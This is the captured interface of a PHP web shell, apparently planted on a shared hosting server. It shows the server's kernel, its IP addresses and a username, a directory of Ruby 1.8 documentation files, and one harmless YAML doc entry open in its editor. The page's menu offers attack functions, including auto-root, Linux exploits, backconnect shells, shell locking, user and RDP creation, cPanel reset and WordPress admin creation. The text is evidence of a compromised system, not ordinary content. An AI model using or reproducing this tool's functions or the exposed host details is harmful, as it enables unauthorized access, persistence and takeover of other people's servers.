Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
FileUtils /
[ HOME SHELL ]
Name
Size
Permission
Action
DryRun
[ DIR ]
drwxr-xr-x
Entry_
[ DIR ]
drwxr-xr-x
NoWrite
[ DIR ]
drwxr-xr-x
StreamUtils_
[ DIR ]
drwxr-xr-x
Verbose
[ DIR ]
drwxr-xr-x
cd-i.yaml
640
B
-rw-r--r--
cdesc-FileUtils.yaml
6.06
KB
-rw-r--r--
chdir-i.yaml
236
B
-rw-r--r--
chmod-i.yaml
598
B
-rw-r--r--
chmod_R-i.yaml
504
B
-rw-r--r--
chown-i.yaml
756
B
-rw-r--r--
chown_R-i.yaml
765
B
-rw-r--r--
cmp-i.yaml
229
B
-rw-r--r--
collect_method-c.yaml
458
B
-rw-r--r--
commands-c.yaml
421
B
-rw-r--r--
compare_file-i.yaml
553
B
-rw-r--r--
compare_stream-i.yaml
307
B
-rw-r--r--
copy-i.yaml
240
B
-rw-r--r--
copy_entry-i.yaml
1.04
KB
-rw-r--r--
copy_file-i.yaml
373
B
-rw-r--r--
copy_stream-i.yaml
356
B
-rw-r--r--
cp-i.yaml
884
B
-rw-r--r--
cp_r-i.yaml
1.29
KB
-rw-r--r--
fu_have_symlink%3f-i.yaml
188
B
-rw-r--r--
fu_world_writable%3f-i.yaml
195
B
-rw-r--r--
getwd-i.yaml
220
B
-rw-r--r--
have_option%3f-c.yaml
506
B
-rw-r--r--
identical%3f-i.yaml
243
B
-rw-r--r--
install-i.yaml
747
B
-rw-r--r--
link-i.yaml
240
B
-rw-r--r--
ln-i.yaml
1.23
KB
-rw-r--r--
ln_s-i.yaml
1.32
KB
-rw-r--r--
ln_sf-i.yaml
364
B
-rw-r--r--
makedirs-i.yaml
248
B
-rw-r--r--
mkdir-i.yaml
539
B
-rw-r--r--
mkdir_p-i.yaml
836
B
-rw-r--r--
mkpath-i.yaml
244
B
-rw-r--r--
move-i.yaml
240
B
-rw-r--r--
mv-i.yaml
787
B
-rw-r--r--
options-c.yaml
414
B
-rw-r--r--
options_of-c.yaml
415
B
-rw-r--r--
pwd-i.yaml
337
B
-rw-r--r--
remove-i.yaml
239
B
-rw-r--r--
remove_dir-i.yaml
356
B
-rw-r--r--
remove_entry-i.yaml
482
B
-rw-r--r--
remove_entry_secure-i.yaml
1.88
KB
-rw-r--r--
remove_file-i.yaml
325
B
-rw-r--r--
rm-i.yaml
659
B
-rw-r--r--
rm_f-i.yaml
414
B
-rw-r--r--
rm_r-i.yaml
1.18
KB
-rw-r--r--
rm_rf-i.yaml
546
B
-rw-r--r--
rmdir-i.yaml
557
B
-rw-r--r--
rmtree-i.yaml
242
B
-rw-r--r--
safe_unlink-i.yaml
251
B
-rw-r--r--
symlink-i.yaml
248
B
-rw-r--r--
touch-i.yaml
531
B
-rw-r--r--
uptodate%3f-i.yaml
538
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : copy_entry-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Copies a file system entry <tt>src</tt> to <tt>dest</tt>. If <tt>src</tt> is a directory, this method copies its contents recursively. This method preserves file types, c.f. symlink, directory... (FIFO, device files and etc. are not supported yet) - !ruby/struct:SM::Flow::P body: Both of <tt>src</tt> and <tt>dest</tt> must be a path name. <tt>src</tt> must exist, <tt>dest</tt> must not exist. - !ruby/struct:SM::Flow::P body: If <tt>preserve</tt> is true, this method preserves owner, group, permissions and modified time. - !ruby/struct:SM::Flow::P body: If <tt>dereference_root</tt> is true, this method dereference tree root. - !ruby/struct:SM::Flow::P body: If <tt>remove_destination</tt> is true, this method removes each destination file before copy. full_name: FileUtils#copy_entry is_singleton: false name: copy_entry params: (src, dest, preserve = false, dereference_root = false, remove_destination = false) visibility: public
Close